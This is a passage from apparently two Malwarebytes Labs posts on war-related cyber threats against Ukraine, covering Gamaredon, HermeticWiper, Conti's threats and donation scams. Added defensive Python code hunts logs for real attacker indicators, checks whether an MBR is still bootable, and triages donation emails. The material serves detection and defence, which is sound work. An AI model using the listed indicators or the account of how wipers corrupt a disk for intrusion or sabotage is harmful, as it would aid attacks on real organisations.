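GAMAREDON_IOCS = ["licensecheckout[.]com", "45.139.186[.]190"]

# Constructed log lines. Line 4 is a look-alike domain that must not match,
# and line 5 is a different IP that shares a prefix with the indicator.
SAMPLE_LOGS = [
    "2022-02-28T10:15:01Z dns client=10.0.0.12 qname=update.licensecheckout.com. qtype=A",
    "2022-02-28T10:15:02Z dns client=10.0.0.12 qname=www.example.org. qtype=A",
    "2022-02-28T10:15:03Z proxy client=10.0.0.12 dst=45.139.186.190:5900 host=-",
    "2022-02-28T10:16:11Z dns client=10.0.0.40 qname=licensecheckout.com.evil-lookalike.test. qtype=A",
    "2022-02-28T10:17:00Z proxy client=10.0.0.41 dst=45.139.186.19:443 host=cdn.example.net",
]

if __name__ == "__main__":
    for ts, client, what in hunt(SAMPLE_LOGS, GAMAREDON_IOCS):
        print(f"{ts} {client} -> {what}")
```

Swap parse_event for a parser of your own DNS or proxy log format; the matching logic stays the same. Matching IPs by exact string (after stripping the port) avoids the prefix false positive that a substring search for "45.139.186.19" would produce.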

Destructive malware

In January, a new destructive malware dubbed WhisperGate was unleashed against Ukrainian targets. It was followed in February by HermeticWiper, malware meant to render a machine unusable by corrupting the Master Boot Record (MBR), so that the system can no longer boot.
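The structure a wiper of this kind destroys is small and well defined: the first 512-byte sector of the disk holds the boot code, a four-entry partition table at offset 446, and the 0x55AA signature in the last two bytes. The following is an added example (editor's code, not Malwarebytes analysis, and it does not reproduce HermeticWiper's exact writes) that parses an MBR and reports why it would no longer boot; the healthy and the wiped sectors are constructed inline.

```python
"""Check whether a 512-byte Master Boot Record is still bootable, the
structure a wiper such as HermeticWiper destroys.

Added example, not Malwarebytes analysis code, and it does not reproduce the
wiper's exact writes: the healthy and wiped sectors below are constructed."""
import struct
from typing import Dict, List, NamedTuple

SECTOR = 512
PT_OFFSET = 446          # four 16-byte partition entries live at 446..509
BOOT_SIG = b"\x55\xaa"   # bytes 510..511 on every valid MBR


class Partition(NamedTuple):
    index: int
    active: bool
    type_id: int
    lba_start: int
    sectors: int


def parse_partitions(mbr: bytes) -> List[Partition]:
    """Decode the non-empty entries of the partition table.

    Entry layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4, LE)
    sector count(4, LE). Status 0x80 marks the active (bootable) partition."""
    parts = []
    for i in range(4):
        off = PT_OFFSET + 16 * i
        status, ptype, lba, count = struct.unpack("<B3xB3xII", mbr[off:off + 16])
        if ptype == 0 and count == 0:
            continue
        parts.append(Partition(i, status == 0x80, ptype, lba, count))
    return parts


def check_mbr(mbr: bytes) -> Dict[str, object]:
    """Return the findings a responder wants before trusting or restoring an MBR."""
    problems: List[str] = []
    if len(mbr) != SECTOR:
        return {"bootable": False, "partitions": [], "problems": ["not 512 bytes"]}
    if mbr[510:512] != BOOT_SIG:
        problems.append("boot signature 0x55AA missing")
    if not any(mbr[:PT_OFFSET]):
        problems.append("boot code region is all zeros")
    parts = parse_partitions(mbr)
    if not parts:
        problems.append("no partition entries")
    elif not any(p.active for p in parts):
        problems.append("no active partition")
    for p in parts:
        if p.lba_start == 0 or p.sectors == 0:
            problems.append(f"partition {p.index} has LBA start {p.lba_start}, {p.sectors} sectors")
    ordered = sorted(parts, key=lambda p: p.lba_start)
    for a, b in zip(ordered, ordered[1:]):
        if b.lba_start < a.lba_start + a.sectors:
            problems.append(f"partitions {a.index} and {b.index} overlap")
    return {"bootable": not problems, "partitions": parts, "problems": problems}


def build_mbr(entries: List[Partition], boot_code: bytes) -> bytes:
    """Assemble a sector from boot code and partition entries (demo helper)."""
    sector = bytearray(SECTOR)
    code = boot_code[:PT_OFFSET]
    sector[:len(code)] = code
    for p in entries:
        off = PT_OFFSET + 16 * p.index
        sector[off:off + 16] = struct.pack(
            "<B3xB3xII", 0x80 if p.active else 0, p.type_id, p.lba_start, p.sectors)
    sector[510:512] = BOOT_SIG
    return bytes(sector)


# Constructed healthy sector: placeholder (non-zero) boot code and two NTFS
# partitions (type 0x07), the first marked active.
HEALTHY_MBR = build_mbr(
    [Partition(0, True, 0x07, 2048, 1024000), Partition(1, False, 0x07, 1026048, 2048000)],
    boot_code=bytes([0xEB, 0x63, 0x90]) + b"\x90" * 100,
)

# Constructed wiped sectors: all zeros, and a filler pattern over every byte.
ZEROED_MBR = bytes(SECTOR)
FILLED_MBR = bytes([0xCC]) * SECTOR

if __name__ == "__main__":
    for label, sector in (("healthy", HEALTHY_MBR), ("zeroed", ZEROED_MBR), ("filled", FILLED_MBR)):
        print(label, check_mbr(sector)["problems"])
```

To check a live disk, read its first sector (for example `dd if=/dev/sda bs=512 count=1` on Linux, or the raw `\\.\PhysicalDrive0` device on Windows) and pass the bytes to check_mbr; keeping a known-good copy of that sector per host is what makes recovery from an MBR wipe quick. One caveat: on GPT disks the first sector is a protective MBR whose single type 0xEE entry is normally not marked active, so relax the active-partition check there.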

Our Threat Intelligence team is currently analyzing this threat and will publish a technical report.

Retaliation threats

The infamous Conti ransomware group announced on February 25 that it would retaliate against any cyber (or physical) attack against Russia:

The Conti Team is officially announcing its full support of the Russian government. If anybody decides to organize a cyberattack or any war activities against Russia, we are going to use all our possible resources to strike back at the critical infrastructure of an enemy.

This was followed by another clarification:

[Screenshot of Conti's follow-up statement; image not reproduced]

If there ever was any doubt that some of the world’s most damaging ransomware groups were aligned with the Kremlin, this sort of allegiance will put an end to it.

Since several countries have announced severe economic sanctions against Russia, we should expect retaliation via cyber means. Russia will perceive those sanctions as a direct attack against its economy, and they know how to respond in kind, not with sanctions but with cyber intrusions on critical infrastructure.

Uncertain times

Organizations have already faced the global ransomware threat for a number of years, and in many ways the same security recommendations continue to apply. What might be different is the intensity of attacks as well as the sheer determination from the adversary. For this reason, we would recommend following best practices outlined by CISA and your country’s CERT.

More than ever, individuals and organizations should be extremely vigilant to phishing attempts and preemptively hunt for possible threats within their environment. Remember to not only deploy but also properly configure your endpoint detection and response (EDR) solution.

At Malwarebytes, we are tracking these cyber threats and ensuring that our customers continue to be protected. According to AV-Comparatives, the Malwarebytes consumer and enterprise products protected test systems against multiple variants of the HermeticWiper malware.

The post Cyber lures and threats in the context of the war in Ukraine appeared first on Malwarebytes Labs.

Potential cybersecurity impacts of Russia’s invasion of Ukraine

On Thursday night, Russia launched a military invasion of its neighbor and former Soviet Union member Ukraine, drawing a broad rebuke from international leaders, along with significant protest from the Russian public.

The toll of human life from this war is unknown, and, like the many international acts of aggression that have preceded it, future figures and statistics will not, alone, make sense of it. The threats and dangers posed by this conflict will be borne by the combatants and the people of Ukraine, and they are in our thoughts. Our collective priority must be people’s physical safety, but Russia’s assault could also produce a range of cybersecurity-related risks that organizations and people will need to protect themselves against, starting today.

Here are some of the ways in which Russia’s invasion of Ukraine may impact cybersecurity, and what organizations can do to stay safe in a continually evolving crisis.

The risk of increased stakes

In tandem with the physical strikes against Ukraine, a piece of wiper malware first detected by researchers at Symantec and ESET had already begun targeting organizations in Ukraine. Analyzed by SentinelOne, this wiper malware has been given the name HermeticWiper, and it differentiates itself from typical malware in one important way: those responsible for it aren’t looking for any payment—they just want to do damage.

(AV-Comparatives quickly tested several known anti-malware and antivirus products against HermeticWiper and its variants and found that Malwarebytes, among others, detected the malware.)

Current analyses of HermeticWiper reveal that the malware is being delivered in highly targeted attacks in Ukraine, Latvia, and Lithuania. Its operators seem to leverage vulnerabilities in external-facing servers while using compromised account credentials to gain access and spread the malware further.

These tactics are nothing new, and familiar cybersecurity best practices around privileged access hold true. But here, the stakes have changed. Even in the worst-case scenario of any ransomware attack, there’s at least a promise (which could admittedly be false) of a decryption key that can be purchased for a price. With wiper malware, there is no such opportunity.

As described by Brian Krebs on his blog:

“Having your organization’s computers and servers locked by ransomware may seem like a day at the park compared to getting hit with ‘wiper’ malware that simply overwrites or corrupts data on infected systems.”

The risk of collateral damage

Russia’s proclivity for cyber warfare is well documented. In the past, the country has been credibly blamed or proven responsible for several cyberattacks against Ukraine and its surrounding neighbors, including DDoS attacks in Estonia in 2007, Georgia in 2008, and Kyrgyzstan in 2009. Russia is also believed to have been responsible for an email spam campaign against Georgia in 2008, and for the delivery of the “Snake” malware against Ukraine’s government in 2014. And in 2015 and 2017, when Ukraine’s power grid suffered two separate shutdowns because of the malware variants BlackEnergy and Industroyer/CrashOverride, much of the evidence reportedly pointed back to Russia.

Though these attacks, like the current attacks involving HermeticWiper, were highly targeted, the idea of “tidy” cyber warfare is a farce.

In June 2017, Russia—as concluded by the CIA just months later—unleashed a cyberattack on Ukraine that spilled out into the world. The cyberattack involved a piece of malware reportedly developed by Russia’s military intelligence agency, the GRU, called NotPetya. Though it presented itself as a common piece of ransomware, it actually worked more like a wiper, destroying the data of its victims, which included banks, energy firms, and government officials.

But the attack, which was reportedly carried out to harm Ukraine’s financial system, spread out, hitting networks in Denmark, India, and the United States.

It was at the time the most devastating cyberattack in history, costing the shipping company Maersk a reported $300 million, and the pharmaceutical giant Merck a reported $870 million.

Though it’s impossible to predict what type of collateral damage could occur, the US Cybersecurity and Infrastructure Security Agency has released a cybersecurity guide for all organizations in the US to follow during this turbulent time. You can read that guide, called Shields Up, here.

The risk of escalation

As Ukraine defends itself against Russian forces, world leaders are faced with a difficult decision. Should they deliver support to Ukraine in any material way, Russia may then retaliate against them with its own cyber-attacks, and these attacks are unlikely to be borne by world leaders. Instead, the “crossfire” between national cyber-fronts will likely inflict harm on everyday individuals and businesses.

Already, this decision has produced a wrinkle, as world leaders are not just defending themselves against Russia’s cyber-offensive regimes, but also against known ransomware gangs that have quickly sworn allegiance to Russia’s cause.

On February 25, the Conti ransomware group announced that it would retaliate against any known physical or cyberattacks against Russia. As we wrote on Malwarebytes Labs:

“If there ever was any doubt that some of the world’s most damaging ransomware groups were aligned with the Kremlin, this sort of allegiance will put an end to it.”

Despite a clarification about an hour later, which attempted to reframe the group’s “full support of Russian government” into “we do not ally with any government”, there can be no doubt about the threat the group poses.

Unfortunately, the risk of escalation seems likely, as countries ramp up economic sanctions against Russia, and as the US is walking a delicate balance about its own cyber initiatives. On February 24, multiple White House officials denied, as NBC News had earlier reported, that the Biden Administration was considering multiple “options” of cyber engagement “on a scale never before contemplated.”

According to White House Press Secretary Jen Psaki, who wrote on Twitter, NBC’s “report on cyber options being presented to @POTUS is off base and does not reflect what is actually being discussed in any shape or form.”

These denials, however, preceded a more recent statement made by President Joe Biden this week, in which he said that “If Russia pursues cyberattacks against our companies, our critical infrastructure, we’re prepared to respond. For months, we’ve been working closely with the private sector to harden our cyber defenses [and] sharpen our response to Russian cyberattacks.”

The risk of misinformation

Already, countless videos have begun circulating online that either make unproven claims or make claims that have specifically been debunked. Earlier today, a video that purports to show a Ukrainian fighter pilot shooting down Russian air forces in the sky was proven to be fake—a product of a simulation game called Digital Combat Simulator.

Though that video was developed as an “homage” to the so-called “Ghost of Kyiv,” social media companies have been combatting a Kremlin-backed disinformation campaign taking place on Twitter, Facebook, YouTube, and TikTok.

According to recent reporting from Politico:

“Russia-backed media reports falsely claiming that the Ukrainian government is conducting genocide of civilians ran unchecked and unchallenged on Twitter and on Facebook. Videos from the Russian government — including speeches from Vladimir Putin — on YouTube received dollars from Western advertisers. Unverified TikTok videos of alleged real-time battles were instead historical footage, including doctored conflict-zone images and sounds.”

Users should digest any viral videos and news with caution, particularly during this conflict, as the primary aggressor has a proven history of information warfare. It is also worth remembering that during wartime even reporting from reputable sources may be based on inaccurate, incomplete or out-of-date information.

The risk of scams

In 2020, as infections of COVID-19 dramatically increased to the point of officially creating a global pandemic, online scammers pounced, sending bogus emails asking for donations to fake charities and registering thousands of COVID-19-related domains to trick unwitting victims into swiping their money or their account credentials.

With Russia’s invasion of Ukraine, the same strategy will likely repeat itself, as online scammers constantly seek the latest crisis to leverage for an attack.

When asked on Twitter for advice on which organizations to donate to in order to help Ukraine, the user @RegGBlinker said that, after she’d read through a list of such organizations, she found many that raised suspicions.

The same Twitter user has already compiled a thread that links to multiple other Twitter users who have personally offered their cybersecurity help to small-to-medium-sized businesses (SMBs) affected by the attacks in Ukraine.

At the same time, several companies and organizations have begun offering their own support. F-Secure, for example, is offering its VPN tool for free to anyone in Ukraine, and The Tor Project has released a support channel for Russian-speaking users who want help in setting up Tor.

The full thread on support can be found here.

For any other donation offers that users think might be a scam, trust the same rules that apply to phishing emails—are there any misspellings, grammar mistakes, unknown senders, or unknown charities involved in the request? Check yourself before handing over any money.
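The sender and charity checks above can be partly automated for mail triage. The following is an added example, not code from Malwarebytes Labs or any of the organizations named in the post: it compares the sender domain against a constructed allowlist of charity domains, flags lookalike domains by edit distance, flags crisis-themed keywords in unknown domains (the pattern described above for the COVID-19 scam domains), and flags messages that name a known charity but were not sent from that charity's domain. The domain names, charity names and keyword list are all placeholders assumed for the example.

```python
"""Triage of donation-request emails against a known-charity allowlist.

Added example; the allowlist, charity names and keywords are constructed
placeholders, not vetting data from the original post.
"""
from dataclasses import dataclass, field
from email.utils import parseaddr

# Constructed allowlist: registrable sender domain -> charity display name.
KNOWN_CHARITIES = {
    "example-relief.org": "Example Relief",
    "example-redcross.org": "Example Red Cross",
}

# Constructed list of crisis-themed tokens often registered in opportunistic domains.
CRISIS_KEYWORDS = ("ukraine", "donate", "relief", "aid", "help")

# Lookalike threshold: a domain this close to a known one is treated as suspicious.
LOOKALIKE_MAX_DISTANCE = 2


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute), used to spot lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


@dataclass
class Verdict:
    domain: str
    flags: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.flags)


def sender_domain(from_header: str) -> str:
    """Extract the lowercase domain from a From: header ("Name <user@host>" or bare address)."""
    _, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage(from_header: str, subject: str, body: str) -> Verdict:
    """Return a Verdict listing every reason the donation request looks suspicious."""
    domain = sender_domain(from_header)
    verdict = Verdict(domain)
    if not domain:
        verdict.flags.append("no sender domain")
        return verdict
    if domain in KNOWN_CHARITIES:
        return verdict  # known sender: nothing to flag here

    verdict.flags.append("unknown sender domain")

    # Lookalike check: a small edit distance to a known charity domain is a classic lure.
    for known in KNOWN_CHARITIES:
        if levenshtein(domain, known) <= LOOKALIKE_MAX_DISTANCE:
            verdict.flags.append(f"lookalike of {known}")

    # Crisis keyword in an unknown domain mirrors the opportunistic-registration pattern.
    if any(keyword in domain for keyword in CRISIS_KEYWORDS):
        verdict.flags.append("crisis keyword in domain")

    # Name-dropping a known charity while sending from elsewhere is impersonation.
    text = f"{subject} {body}".lower()
    for known, name in KNOWN_CHARITIES.items():
        if name.lower() in text:
            verdict.flags.append(f"mentions {name} but not sent from {known}")

    return verdict


if __name__ == "__main__":
    # Constructed sample messages.
    samples = [
        ("Example Relief <info@example-relief.org>", "Thank you", "Your gift was received."),
        ("Example Relief <info@example-re1ief.org>", "Example Relief appeal", "Please give today."),
        ("help@ukraine-donate-now.example", "Help now", "Please give today."),
    ]
    for hdr, subj, body in samples:
        v = triage(hdr, subj, body)
        print(f"{v.domain or '<none>'}: {'SUSPICIOUS ' + str(v.flags) if v.suspicious else 'ok'}")
```

The allowlist stands in for whatever vetted list of organizations a team actually maintains; the edit-distance threshold is deliberately small so that legitimate, unrelated charities are not flagged as lookalikes, and a message from an unknown domain is only ever flagged, never silently dropped.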

The risk of focusing too heavily on Ukraine

While Ukraine is in crisis, several online threat actors have continued their own assault campaigns.

On February 24, multiple outlets reported that a ransomware gang that the cybersecurity firm Mandiant tracks as “UNC2596” was exploiting vulnerabilities in Microsoft Exchange to deliver its preferred ransomware, colloquially dubbed “Cuba.” On the same day, the US Cybersecurity and Infrastructure Security Agency (CISA) announced that it had spotted “malicious cyber operations by Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater.” Those attacks were targeting both government and private-sector organizations in Asia, Africa, Europe, and North America.

An international human crisis is in no way a cause for inaction from online threat actors. Organizations should follow the same guidance they have before in protecting themselves from the most common online threats.

As CISA Director Jen Easterly warned on Twitter:

“Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners.”

The post Potential cybersecurity impacts of Russia’s invasion of Ukraine appeared first on Malwarebytes Labs.